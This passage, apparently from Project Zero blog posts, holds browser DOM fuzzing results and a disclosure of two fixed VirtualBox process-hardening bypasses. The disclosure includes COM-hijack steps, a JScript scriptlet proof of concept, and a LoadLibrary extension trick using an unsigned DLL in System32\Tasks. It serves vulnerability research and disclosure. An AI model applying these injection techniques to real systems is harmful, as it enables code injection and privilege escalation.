Instead of going into much technical detail here, the reader is referred to the fuzzer code and documentation. It is my hope that by open-sourcing the fuzzer I would invite community contributions that would cover the areas I might have missed in the fuzzer or grammar creation.
Setup
We tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100,000,000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100,000,000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptible VMs (which I think work well for fuzzing jobs as they don’t need to be up all the time) and 10 seconds per run.
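As a back-of-the-envelope check of those figures, the snippet below works out the total VM time involved. It assumes one sample runs per VM at a time; the implied hourly rate is simply derived from the numbers quoted above and is not an actual Google Compute Engine price.

```python
ITERATIONS = 100_000_000   # samples per browser
SECONDS_PER_RUN = 10       # time budget per sample
BUDGET_USD = 1_000         # approximate cost quoted above

vm_seconds = ITERATIONS * SECONDS_PER_RUN   # 1,000,000,000 seconds of VM time
vm_hours = vm_seconds / 3600                # roughly 277,778 VM-hours
implied_rate = BUDGET_USD / vm_hours        # roughly 0.0036 USD per VM-hour
vms_for_one_week = vm_hours / (7 * 24)      # roughly 1,653 VMs running for a week
```

In other words, a single machine would need over thirty years to get through the same workload, which is why the experiment has to be spread across a large cluster.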
Here are additional details of the fuzzing setup for each browser:
  • Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds.

  • Mozilla Firefox was fuzzed on internal Google infrastructure (Linux-based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build.

  • Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of an ASAN build, page heap was applied to the iexplore.exe process to make it easier to catch some types of issues.

  • Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why, to fuzz it, we created a virtual cluster of Windows 10 VMs on Microsoft Azure. As with Internet Explorer, page heap was applied to the MicrosoftEdgeCP.exe process before fuzzing.

  • Instead of fuzzing Safari directly, which would require Apple hardware, we used WebKitGTK+, which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.
Results
Without further ado, the number of security bugs found in each browser is captured in the table below.
Only security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know if bugs in development versions would be caught by internal review and fuzzing processes before release).
Vendor | Browser | Engine | Number of Bugs | Project Zero Bug IDs
Google | Chrome | Blink | 2 | 994, 1024
Mozilla | Firefox | Gecko | 4** | 1130, 1155, 1160, 1185
Microsoft | Internet Explorer | Trident | 4 | 1011, 1076, 1118, 1233
Microsoft | Edge | EdgeHtml | 6 | 1011, 1254, 1255, 1264, 1301, 1309
Apple | Safari | WebKit | 17 | 999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250
Total | | | 31* |
* While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers.
** The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here.
As can be seen in the table, most browsers did relatively well in the experiment, with only a couple of security-relevant crashes found. Since the same methodology used to yield a significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not statistically significant enough to justify saying that one browser’s DOM engine is better or worse than another.
However, Apple Safari is a clear outlier in the experiment, with a significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago, they were using the same DOM engine (WebKit). It appears that after the Blink/WebKit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.
It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of a useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it!
When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser and instead focus on just a single component (DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as the presence and security of a sandbox, bugs in other components such as scripting engines, etc. I also cannot disregard the possibility that, within DOM, my fuzzer is more capable of finding certain types of issues than others, which might have an effect on the overall stats.

Experimenting with coverage-guided DOM fuzzing
Since coverage-guided fuzzing seems to produce very good results in other areas, we wanted to combine it with DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and a modified WinAFL DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:
  1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.
  2. The fuzzer spawns an IE process, which opens a harness HTML page.
  3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe.
  4. After the sample executes, it notifies the harness, which notifies the fuzzer to stop collecting coverage.
  5. The coverage map is examined and, if it contains unseen coverage, the corresponding sample is added to the corpus.
  6. Go to step 3 until all samples are executed or the IE process crashes.
  7. Periodically minimize the corpus using AFL’s cmin algorithm.
  8. Go to step 1.
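
The flow above can be sketched as a small loop. This is only an illustration under stated assumptions: toy_coverage and mutate are hypothetical stand-ins for running a sample in IE under the DynamoRIO client and for the Domato-based mutator, and corpus minimization (step 7) is left out.

```python
import random

def toy_coverage(sample):
    # Hypothetical stand-in for running a sample in the browser and reading
    # back the coverage map: each token "covers" one of 16 blocks.
    return {token % 16 for token in sample}

def mutate(sample, rng):
    # Hypothetical mutation: append one new token to an existing sample.
    return sample + (rng.randrange(1000),)

def fuzz(corpus, rounds, batch_size, seed=0):
    rng = random.Random(seed)
    seen = set()
    for sample in corpus:
        seen |= toy_coverage(sample)
    for _ in range(rounds):
        # Step 1: generate a batch by mutating existing corpus entries.
        batch = [mutate(rng.choice(corpus), rng) for _ in range(batch_size)]
        # Steps 2-6: run each sample, keep those that reach unseen coverage.
        for sample in batch:
            coverage = toy_coverage(sample)
            if not coverage <= seen:
                seen |= coverage
                corpus.append(sample)
        # Step 7 (corpus minimization) is omitted in this sketch.
    return corpus, seen

corpus, seen = fuzz([(0,)], rounds=50, batch_size=10)
print(len(corpus), "samples in corpus,", len(seen), "blocks covered")
```

Because a sample is kept only when it adds coverage, the corpus can never grow past the number of distinct blocks in the toy target.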

The following set of mutations was used to produce new samples from the existing ones:
  • Adding new CSS rules
  • Adding new properties to the existing CSS rules
  • Adding new HTML elements
  • Adding new properties to the existing HTML elements
  • Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.
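
As a rough illustration of the last mutation in the list, the sketch below appends a JavaScript line that reuses a variable already declared in the sample. The helper names and the generated statements are hypothetical and are not taken from the actual fuzzer.

```python
import random
import re

def existing_variables(js_lines):
    # Collect names declared with "var NAME" in the existing sample.
    names = []
    for line in js_lines:
        names += re.findall(r"\bvar\s+([A-Za-z_]\w*)", line)
    return names

def add_js_line(js_lines, rng):
    # Hypothetical mutation: call a method on a variable that already exists,
    # or declare a first element if the sample has no variables yet.
    names = existing_variables(js_lines)
    if names:
        target = rng.choice(names)
        new_line = f"{target}.appendChild(document.createElement('div'));"
    else:
        new_line = "var v0 = document.createElement('div');"
    return js_lines + [new_line]

rng = random.Random(1)
sample = add_js_line([], rng)
sample = add_js_line(sample, rng)
print("\n".join(sample))
```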

Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.

Conclusion
As stated before, DOM engines have been one of the largest sources of web browser bugs. While bugs of this type are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing, as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture.
The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.

Bypassing VirtualBox Process Hardening on Windows

Google Project Zero - Wed, 08/23/2017 - 12:10
Posted by James Forshaw, Project Zero
Processes on Windows are securable objects, which prevents one user logged into a Windows machine from compromising another user’s processes. This is a pretty important security feature, at least from the perspective of a non-administrator user. The security prevents a non-administrator user from compromising the integrity of an arbitrary process. This security barrier breaks down when trying to protect against administrators, specifically administrators with Debug privilege, as enabling this privilege allows the administrator to open any process regardless of the security applied to it.
There are cases where applications or the operating system want to actively defend processes from users such as administrators or even, in some cases, the same user as the running process who’d normally have full access. Protecting the processes is a pretty hard challenge if done entirely from user mode applications. Therefore many solutions use kernel support to perform the protection. In the majority of cases these sorts of techniques still have flaws, which we can exploit to compromise the “protected” process.
This blog post will describe the implementation of Oracle’s VirtualBox protected process and detail three different, but now fixed, ways of bypassing the protection and injecting arbitrary code into the process. The techniques I’ll present can equally be applied to similar implementations of “protected” processes in other applications.

Oracle VirtualBox Process Hardening
Protecting processes entirely in user mode is pretty much impossible; there are just too many ways of injecting content into a process. This is especially true when the process you’re trying to protect is running under the same context as the user you’re trying to block. An attacker could, for example, open a handle to the process with PROCESS_CREATE_THREAD access and directly inject a new thread. Or they could open a thread in the process with THREAD_SET_CONTEXT access and directly change the Instruction Pointer to jump to an arbitrary location. These are just the direct attacks. The attacker could also modify the registry or environment the process is running under, then force the process to load arbitrary COM objects, or Windows Hooks. The list of possible modifications is almost endless.
Therefore, VirtualBox (VBOX) enlists the help of the kernel to try to protect its processes. The source code refers to this as Process Hardening. VBOX tries to protect the processes from the same user the process is running under. A detailed rationale and technical overview is provided in source code comments. The TL;DR is that the protection gates access to the VBOX kernel drivers, which by design expose a number of methods that can be used to compromise the kernel, or at least elevate privileges. This is why VBOX tries to prevent the current user from compromising the process: getting access to the VBOX kernel driver would be a route to Kernel or System privileges. As we’ll see, though, while some protections also prevent administrators from compromising the processes, that’s not the aim of the hardening code.
Multiple examples of issues with the driver and protection from device access were discovered by my colleague Jann in VBOX on Linux. On Linux, VBOX limits access to the VBOX driver to root only, and uses SUID binaries to allow the VBOX user processes to get access to the driver before dropping privileges. On Windows instead of SUID binaries the VBOX driver uses kernel APIs to try to stop users and administrators opening protected processes and injecting code.
The core of the kernel component is in the Support\win\SUPDrv-win.cpp file. This code registers with two callback mechanisms supported by modern Windows kernels:
  1. PsSetCreateProcessNotifyRoutineEx - Driver is notified when a new process is created.
  2. ObRegisterCallbacks - Driver is notified when Process and Thread handles are created or duplicated.
The notification from PsSetCreateProcessNotifyRoutineEx is used to configure the protection structures for a new process. When the process subsequently tries to open a handle to the VBOX driver the hardening will only permit access after the following verification steps are performed in the call to supHardenedWinVerifyProcess:
  1. Ensure there are no debuggers attached to the process.
  2. Ensure there is only a single thread in the process, which should be the one opening the driver to prevent in-process races.
  3. Ensure there are no executable memory pages outside of a small set of permitted DLLs.
  4. Verify the signatures of all loaded DLLs.
  5. Check the main executable’s signature and that it is of a permitted type of executable (e.g. VirtualBox.exe).

Signature verification in the kernel is done using custom runtime code compiled into the driver. Only a limited set of Trusted Roots are permitted to be verified at this step, primarily Microsoft’s OS and Authenticode certificates as well as the Oracle certificate that all VBOX binaries are signed with. You can find the list of permitted certificates in the source repository.
The ObRegisterCallbacks notification is used to limit the maximum access any other user process on the system can be granted to the protected process. The ObRegisterCallbacks API was designed for Anti-Virus to protect processes from being injected into or terminated by malicious code. VBOX uses a similar approach and limits any handle to the protected process to the following access rights:

The permitted access rights give the user most of the typical rights they’d expect, such as being able to read memory, synchronize to the process and terminate it but does not allow injecting new code into the process. Similarly, access to threads is restricted to the following access rights to prevent modification of a thread’s context or similar attacks.
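
The effect of this kind of handle filtering can be sketched as a bit mask applied to the requested access. The constants below are the standard Windows access right values. The ALLOWED set is an assumption built only from the rights the text names (read memory, synchronize, terminate) and is not VBOX's actual mask.

```python
# Standard Windows process access right values.
PROCESS_TERMINATE     = 0x0001
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION  = 0x0008
PROCESS_VM_READ       = 0x0010
PROCESS_VM_WRITE      = 0x0020
SYNCHRONIZE           = 0x00100000

# Assumption: an illustrative allow-list based only on the rights mentioned
# in the text; the real list used by the driver is longer.
ALLOWED = PROCESS_TERMINATE | PROCESS_VM_READ | SYNCHRONIZE

def filter_desired_access(desired):
    # A pre-operation callback can only strip rights from the request.
    return desired & ALLOWED

granted = filter_desired_access(PROCESS_CREATE_THREAD | PROCESS_VM_WRITE | PROCESS_VM_READ)
print(hex(granted))
```

A caller asking for thread creation or memory write access still gets a handle, but one that only carries the read right, which is why direct injection fails.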

We can verify this access limitation by opening the VirtualBox process and one of its threads and see what access rights we’re granted. For example the following picture highlights the process and thread granted access.

While the kernel callbacks prevent direct modification of the process as well as a user trying to compromise the integrity of the process at startup they do very little against runtime DLL injection such as through COM. The hardening implementation needs to decide on what modules it’ll allow to be loaded into the process. The decision, fundamentally, is based on Authenticode code signing.
There are mitigation options to enable loading only Microsoft signed binaries (such as PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY). However, this policy isn’t very flexible. Therefore, protected VBOX processes install hooks to a couple of internal functions in user-mode to verify the integrity of any DLL which is being loaded into memory. The hooked functions are:
  1. LdrLoadDll - Called to load a DLL into memory.
  2. NtCreateSection - Called to create an Image Section object for a PE file on disk.
  3. LdrRegisterDllNotification - This is a quasi-officially supported callback which notifies the application when a new DLL is loaded or unloaded.

These hooks expand the permitted set of signed DLLs which can be loaded. The kernel signature verification is okay for bootstrapping the process, as only Oracle and Microsoft code should be present. However, when it comes to running a non-trivial application (VirtualBox.exe is certainly non-trivial) you’re likely to need to load third-party signed code such as GPU drivers. As the hooks are in user mode it’s easier to call the system WinVerifyTrust API, which will verify certificate chains using the system certificate stores as well as handling the verification of files signed in a Catalog file.
If the DLL being loaded doesn’t meet VBOX’s expected criteria for signing then the user-mode hooks will reject loading that DLL. VBOX still doesn't completely trust the user; WinVerifyTrust will chain certificates back to a root certificate in the user’s CA certificates. However, VBOX will only trust system CA certificates. As a non-administrator cannot add a new trusted root certificate to the system’s list of CA certificates this should severely limit the injection of malicious DLLs.
You can get a real code signing certificate which should also be trusted, but the assumption is malicious code wouldn’t want to go down that route. Even if the code is signed the loader also checks that the DLL file is owned by the TrustedInstaller user. This is checked in supHardNtViCheckIsOwnedByTrustedInstallerOrSimilar. A normal user should not be able to change the owner of a file to anything but themselves, therefore it should limit the impact of the behavior to allow any signed file to load.
The VBOX code does have a function, supR3HardenedWinIsDesiredRootCA, which is supposed to restrict which certificates are permitted as roots. In official builds the function’s whitelist of specific CAs is commented out. There’s a blacklist of certificates; however, unless your company is called “U.S. Robots and Mechanical Men, Inc” the blacklist won’t affect you.
Even with all this protection the process isn’t secure against an administrator. While an administrator can’t bypass the security on opening the process, they can install a local machine Trusted Root CA certificate and sign a DLL, set its owner and force it to be loaded. This will bypass the image verification and load into the verified VBOX process.
In summary the VBOX hardening is attempting to provide the following protections:
  1. Ensure that no code is injected into protected binaries during initialization.
  2. Prevent user processes from opening “writable” handles to protected processes or threads which would allow arbitrary code injection.
  3. Prevent injection of untrusted DLLs through normal loading routes such as COM.

This whole process is likely to have some bugs and edge cases. There are so many different verification checks which must all fit together. So, assuming we don’t want to get a code signing certificate and we don’t have administrator rights, how can we get arbitrary code running inside a protected VBOX process? We’ll focus primarily on the third protection in the list, as this is perhaps the most complex part of the protection and therefore is likely to have the most issues.

Exploiting the Chain-of-Trust in COM Registration
The first bug I’m going to describe was fixed as CVE-2017-3563 in VBOX version 5.0.38/5.1.20. This issue exploits the chain-of-trust for DLL loading to trick VBOX into loading Microsoft signed DLLs which just happen to allow untrusted arbitrary code execution.
If you run Process Monitor against the protected VBOX process you’ll notice that it uses COM, specifically it uses the VirtualBoxClient class which is implemented in the VBoxC.dll COM server.

The nice thing about COM server registration, at least from the perspective of an attacker, is the registration for a COM object can be in one of two places, the user’s registry hive, or the local machine registry hive. For reasons of compatibility the user’s hive is checked first, before falling back to the local machine hive. Therefore it’s possible to override a COM registration with a normal user’s permission, so when an application tries to load the designated COM object the application will instead load whatever DLL we’ve overridden it with.
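The lookup order described above can be modelled with two dictionaries standing in for the registry hives. This is a minimal sketch: the CLSID is a placeholder and the VBoxC.dll install path is an assumption, neither is taken from a real registration.

```python
def resolve_inproc_server(clsid, user_hive, machine_hive):
    # The per-user registration is consulted first; the machine-wide
    # registration is only the fallback.
    for hive in (user_hive, machine_hive):
        if clsid in hive:
            return hive[clsid]
    return None

# Placeholder CLSID and assumed install path, for illustration only.
CLSID = "{00000000-0000-0000-0000-000000000000}"
machine_hive = {CLSID: r"C:\Program Files\Oracle\VirtualBox\VBoxC.dll"}
user_hive = {}

before = resolve_inproc_server(CLSID, user_hive, machine_hive)
user_hive[CLSID] = r"c:\dummy\testdll.dll"   # written with normal user rights
after = resolve_inproc_server(CLSID, user_hive, machine_hive)
print(before, "->", after)
```

Nothing in the machine hive changes; the override works purely because the user's entry is found first.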
Hijacking COM objects is not a new technique; it’s been known for many years, especially for the purposes of malware persistence. It’s seen a resurgence of late because of the renewed interest in all things COM. However, it’s rare that COM hijacking is of importance for elevation of privilege outside of UAC bypasses.
As an aside, the connection between UAC and COM hijacking is the COM runtime actively tries to prevent the hijack being used as an EoP route by disabling certain User registry lookups if the current process is elevated. Of course it wasn’t always successful. This behavior only makes sense if you view UAC through the prism of it being a defendable security boundary, which Microsoft categorically claim it’s not and never was. For example this blog post from early 2007 specifically states this behavior is to prevent Elevation of Privilege. I think the COM lookup behavior is one of the clearest indicators that UAC was originally designed to be a security boundary. It failed to meet the security bar and so was famously retconned into helping “developers” write better code.
If we could replace the COM registration with our own code we should be able to get code execution inside the hardened process. In theory all the hardening signing checks should stop us from loading untrusted code. In research, it’s always worth trying something which you believe should fail just in case as sometimes you get a nice surprise. At minimum it’ll give you insight into how the protection really works. I registered a COM object to hijack the VirtualBoxClient class in the user’s hive and pointed it at an unsigned DLL (Full Disclosure, I used an admin account to tweak the Owner to TrustedInstaller just to test). When I tried to start a Virtual Machine I got the following dialog.

It’s possible that I just made a mistake in the COM registration, however testing the COM object in a separate application worked as expected. Therefore this error is likely a result of failing to load the DLL. Fortunately, VBOX is generous and enables by default a log of all Process Hardening events. It’s named VBoxHardening.log and is located in the Logs folder in the Virtual Machine you tried to start. Searching for the name of the DLL we find the following entries (heavily modified for brevity):
supHardenedWinVerifyImageByHandle: -> -22900 (c:\dummy\testdll.dll)
supR3HardenedScreenImage/LdrLoadDll: c:\dummy\testdll.dll: Not signed.
supR3HardenedMonitor_LdrLoadDll: rejecting 'c:\dummy\testdll.dll'
supR3HardenedMonitor_LdrLoadDll: returns rcNt=0xc0000190
So clearly our test DLL isn’t signed and so the LdrLoadDll hook rejects it. The LdrLoadDll hook returns an error code which propagates back up to the COM DLL loader, which results in COM thinking the class doesn’t exist.
While it’s not surprising that it wasn’t as simple as just specifying our own DLL (and don’t forget we cheated with setting the Owner) it at least gives us hope as this result means the VBOX process will use our hijacked COM registration. All we need therefore is a COM object which meets the following criteria:
  1. It’s signed by a trusted certificate.
  2. It’s owned by TrustedInstaller.
  3. When loaded will do something that allows for arbitrary code execution in the process.

Criteria 1 and 2 are easy to meet: any Microsoft COM object on the system is signed by a trusted certificate (one of Microsoft’s publisher certificates) and is almost certainly owned by TrustedInstaller. However, criterion 3 would seem much more difficult to meet: a COM object is usually implemented inside the DLL and we can’t modify the DLL itself, otherwise it would no longer be signed. It just so happens that there is a Microsoft signed COM object installed by default which will allow us to meet criterion 3: Windows Script Components (WSC).
WSC, also sometimes called Scriptlets, are also having a good run at the moment. They can be used as an AppLocker bypass as well as being loaded from HTTP URLs. What’s of most interest in this case is that they can also be registered as a COM object.
A registered WSC consists of two parts:
  1. The WSC runtime scrobj.dll which acts as the in-process COM server.
  2. A file which contains the implementation of the Scriptlet in a compatible scripting language.

When an application tries to load the registered class, scrobj.dll gets loaded into memory. The COM runtime requests a new object of the required class, which causes the WSC runtime to go back to the registry to look up the URL to the implementation Scriptlet file. The WSC runtime then loads the Scriptlet file and executes the embedded script contained in the file in-process. The key here is that as long as scrobj.dll (and any associated script language libraries such as JScript.dll) are valid signed DLLs from VBOX’s perspective then the script code will run, as it can never be checked by the hardening code. This would get arbitrary code running inside the hardened process. First let’s check that scrobj.dll is likely to be allowed to be loaded by VBOX. The following screenshot shows the DLL is both signed by Microsoft and is also owned by TrustedInstaller.

So what does a valid Scriptlet file look like? It’s a simple XML file. I’m not going to go into much detail about what each XML element means, other than to point out the script block which will execute arbitrary JScript code. In this case all this Scriptlet will do when loaded is start the Calculator process.
<scriptlet>
 <registration description="Component"/>
 <script language="JScript">
 new ActiveXObject('WScript.Shell').Exec('calc');
 </script>
</scriptlet>
If you’ve written much code in JScript or VBScript you might now notice a problem: these languages can’t do that much unless it’s implemented by a COM object. In the example Scriptlet file we can’t create a new process without loading the WScript.Shell COM object and calling its Exec method. In order to talk to the VBOX driver, which is the whole purpose of injecting code in the first place, we’d need a COM object which gives us that functionality. We can’t implement the code in another COM object as that wouldn’t pass the image signing checks we’re trying to bypass. Of course, there’s always memory corruption bugs in scripting engines but, as everyone already knows by now, I’m not a fan of exploiting memory corruptions so we need some other way of getting fully arbitrary code execution. Time to bring in the big guns, the .NET Framework.
The .NET runtime loads code into memory using the normal DLL loading routines. We can’t therefore load a .NET DLL which isn’t signed into memory as that would still get caught by VBOX’s hardening code. However, .NET does support loading arbitrary code from an in-memory array using the Assembly::Load method and once loaded this code can basically act as if it was native code, calling arbitrary APIs and inspecting/modifying memory. As the .NET framework is signed by Microsoft all we need to do is somehow call the Load method from our Scriptlet file and we can get full arbitrary code running inside the process.
Where do we even start on achieving this goal? From a previous blog post it’s possible to expose .NET objects as COM objects through registration and by abusing Binary Serialization we can load arbitrary code from a byte array. Many core .NET runtime classes are automatically registered as COM objects which can be loaded and manipulated by a scripting engine. The big question can now be asked, is BinaryFormatter exposed as a COM object?

Why, yes it is. BinaryFormatter is a .NET object that a scripting engine can load and interact with via COM. We could now take the final binary stream from my previous post and execute arbitrary code from memory. In the previous blog post the execution of the untrusted code had to occur during deserialization, in this case we can interact with the results of deserialization in a script which can make the serialization gadgets we need much simpler.
In the end I chose to deserialize a Delegate object which, when executed by the script engine, would load an Assembly from memory and return the Assembly instance. The script engine could then instantiate an instance of a Type in that Assembly and run arbitrary code. It does sound simple in principle, but in reality there are a number of caveats. Rather than bog down this blog post with more detail than necessary, the tool I used to generate the Scriptlet file, DotNetToJScript, is available so you can read how it works yourself. Also the PoC is available on the issue tracker here. The chain from the JScript component to being able to call the VBOX driver looks something like the following:

I’m not going to go into what you can now do with the VBOX driver once you’ve got arbitrary code running in the hardened process; that’s certainly a topic for another post. Although you might want to look at one of Jann’s issues which describes what you might do on Linux.
How did Oracle fix the issue? They added a blacklist of DLLs which are not allowed to be loaded by the hardened VBOX process. The only DLL currently in that list is scrobj.dll. The list is checked after the verification of the file has taken place and covers both the current filename as well as the internal Original Filename in the version resources. This prevents you just renaming the file to something else, as the version resources are part of the signed PE data and so cannot be modified without invalidating the signature. In fairness to Oracle I’m not sure there was any other sensible way of blocking this attack vector other than a DLL blacklist.

Exploiting User-Mode DLL Loading Behavior
The second bug I’m going to describe was fixed as CVE-2017-10204 in VBOX version 5.1.24. This issue exploits the behavior of the Windows DLL loader and some bugs in VBOX to trick the hardening code to allow an unverified DLL to be loaded into memory and executed.
While this bug doesn’t rely on exploiting COM loading as such, the per-user COM registration is a convenient technique to get LoadLibrary called with an arbitrary path. Therefore we’ll continue to use the technique of hijacking the VirtualBoxClient COM object and just use the in-process server path as a means to load the DLL.
LoadLibrary is an API with a number of well known, but strange behaviors. One of the more interesting from our perspective is the behavior with filename extensions. Depending on the extension the LoadLibrary API might add or remove the extension before trying to load the file. I can summarise it in a table, showing the file name as passed to LoadLibrary and the file it actually tries to load.
Original File Name | Loaded File Name
c:\test\abc.dll | c:\test\abc.dll
c:\test\abc | c:\test\abc.dll
c:\test\abc.blah | c:\test\abc.blah
c:\test\abc. | c:\test\abc
The two important cases are the extension-less name (c:\test\abc) and the name ending in a dot (c:\test\abc.). These are the cases where the filename passed into LoadLibrary doesn’t match the filename which eventually gets loaded. The problem for any code trying to verify a DLL file before loading it is that CreateFile doesn’t follow these rules, so in these two cases, if you opened the file for signature verification using the original file name, you’d verify a different file to the one which eventually gets loaded.
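The four rows of the table above can be captured in a small model. This sketch reproduces only the behavior listed in the table and makes no claim about other loader rules such as search paths. The function name is hypothetical.

```python
import ntpath

def loaded_file_name(requested):
    # Model of the four rows in the table above, nothing more.
    directory, name = ntpath.split(requested)
    if name.endswith("."):
        name = name[:-1]        # trailing dot: stripped, nothing appended
    elif "." not in name:
        name = name + ".dll"    # no extension: ".dll" is appended
    return ntpath.join(directory, name)

for requested in (r"c:\test\abc.dll", r"c:\test\abc",
                  r"c:\test\abc.blah", r"c:\test\abc."):
    verified = requested                    # what a CreateFile-based check opens
    loaded = loaded_file_name(requested)    # what the loader ends up mapping
    print(f"{requested:18} verified={verified:18} loaded={loaded}")
```

Any verifier that opens the requested name as-is checks a different file from the one loaded in exactly the two mismatching rows.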
In Windows there’s usually a clear separation between Kernel32 code, which tends to deal with the many weird behaviors Win32 has built up over the years and the “clean” NT layer exposed by the kernel through NTDLL. Therefore as LoadLibrary is in Kernel32 and LdrLoadDll (which is the function the hardening hooks) is in NTDLL then this weird extension behavior would be handled in the former. Let’s look at a very simplified version of LoadLibrary to see if that’s the case:
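HMODULE LoadLibrary(LPCWSTR lpLibFileName)
{
  UNICODE_STRING DllPath;
  HMODULE ModuleHandle;
  ULONG Flags = 0; /* real flags elided in this simplified version */

  /* The only transformation: wrap the path in a UNICODE_STRING. */
  RtlInitUnicodeString(&DllPath, lpLibFileName);
  /* Search path argument simplified to NULL in this sketch. */
  if (NT_SUCCESS(LdrLoadDll(NULL,
      &Flags, &DllPath, (PVOID *)&ModuleHandle))) {
    return ModuleHandle;
  }
  return NULL;
}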
We can see in this code that for all intents and purposes LoadLibrary is just a wrapper around LdrLoadDll. While it’s really more complex than that in reality the takeaway is that LoadLibrary does not modify the path it passes to LdrLoadDll in any way other than converting it to a UNICODE_STRING. Therefore perhaps if we specify a DLL to load without an extension VBOX will check the extension-less file for the signature but LdrLoadDll will instead load the file with the .DLL extension.
Before we can test that we’ve got another problem to deal with, the requirement that the file is owned by TrustedInstaller. For the file we want VBOX to signature check all we need to do is give an existing valid, signed file a different filename. This is what hard links were created for; we can create a different name in a directory we control which actually links to a system file which is signed and also maintains its original security descriptor including the owner. The trouble with hard links is, as I described almost 2 years ago in a blog post, while Windows supports creating links to system files you can’t write to, the Win32 APIs, and by extension the easy to access “mklink” command in the CMD shell require the file be opened with FILE_WRITE_ATTRIBUTES access. Instead of using another application to create the link we’ll just copy the file, however the copy will no longer have the original security descriptor and so it’ll no longer be owned by TrustedInstaller. To get around that let’s look at the checking code to see if there’s a way around it.
The main check for the Owner is in supHardenedWinVerifyImageByLdrMod. Almost the first thing that function does is call supHardNtViCheckIsOwnedByTrustedInstallerOrSimilar, which we saw earlier. However, as the comments above the check indicate, the code will also allow files under the System32 and WinSxS directories to not be owned by TrustedInstaller. This is a bus-sized hole in the point of the check, as all we need is one writeable directory under System32. We can find some by running the Get-AccessibleFile cmdlet in my NtObjectManager PS module.
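The relaxed owner check can be sketched as follows. This is a simplified model, not the VBOX implementation: it assumes %SystemRoot% is c:\windows and treats the relaxed locations as plain path prefixes.

```python
import ntpath

TRUSTED_OWNER = "TrustedInstaller"
# Assumptions: %SystemRoot% is c:\windows, and the relaxed locations are
# modelled as simple path prefixes.
RELAXED_DIRS = (r"c:\windows\system32", r"c:\windows\winsxs")

def owner_check_passes(path, owner):
    if owner == TRUSTED_OWNER:
        return True
    normalized = ntpath.normpath(path).lower()
    # Files under the relaxed directories pass regardless of owner.
    return any(normalized.startswith(d + "\\") for d in RELAXED_DIRS)

print(owner_check_passes(r"c:\dummy\testdll.dll", "user"))
print(owner_check_passes(r"C:\Windows\System32\Tasks\Dummy\ABC", "user"))
```

The second call passes even though the file belongs to an ordinary user, which is why a single user-writable directory under System32 is enough to defeat the check.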

There are plenty to choose from; we’ll just pick the Tasks folder as it’s guaranteed to always be there. So the exploit should be as follows:
  1. Copy a signed binary to %SystemRoot%\System32\Tasks\Dummy\ABC
  2. Copy an unsigned binary to %SystemRoot%\System32\Tasks\Dummy\ABC.DLL
  3. Register a COM hijack pointing the in-process server to the signed file path from 1.

If you try to start a Virtual Machine you’ll find that this trick works. The hardening code checks the ABC file for the signature, but LdrLoadDll ends up loading ABC.DLL. Just to check we didn’t just exploit something else let’s check the hardening log:
\..\Tasks\dummy\ABC: Owner is not trusted installer
\..\Tasks\dummy\ABC: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
